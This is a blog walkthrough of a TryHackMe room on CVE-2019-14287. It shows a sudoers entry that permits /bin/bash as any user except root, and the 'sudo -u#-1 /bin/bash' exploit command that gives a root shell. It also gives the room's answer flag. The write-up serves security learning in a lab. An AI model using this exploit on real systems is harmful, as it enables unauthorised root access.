---
layout: post
title: "Sudo Security Bypass - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - thm
  - linux
  - eop
  - sudo
date: 2021/02/06 15:37:00
thumbnail: /images/TryHackMe/sudovulnsbypass.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Sudo Security Bypass
- **Profile:** [tryhackme.com](https://tryhackme.com/room/sudovulnsbypass)
- **Difficulty:** Easy
- **Description**: A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series

![Sudo Security Bypass](/images/TryHackMe/sudovulnsbypass.png)

# Write-up

## Security Bypass

> What command are you allowed to run with sudo?

Answer: {% spoiler `/bin/bash` %}

To see which command we can run as which user:

```plaintext
tryhackme@sudo-privesc:~$ sudo -ll
Matching Defaults entries for tryhackme on sudo-privesc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tryhackme may run the following commands on sudo-privesc:

Sudoers entry:
    RunAsUsers: ALL, !root
    Options: !authenticate
    Commands:
        /bin/bash
```

> What is the flag in /root/root.txt?

Answer: {% spoiler `THM{l33t_s3cur1ty_bypass}` %}

We can exploit CVE-2019-14287 as explained in the course material.

```plaintext
tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash

root@sudo-privesc:~# id
uid=0(root) gid=1000(tryhackme) groups=1000(tryhackme)

root@sudo-privesc:~# cat /root/root.txt
```
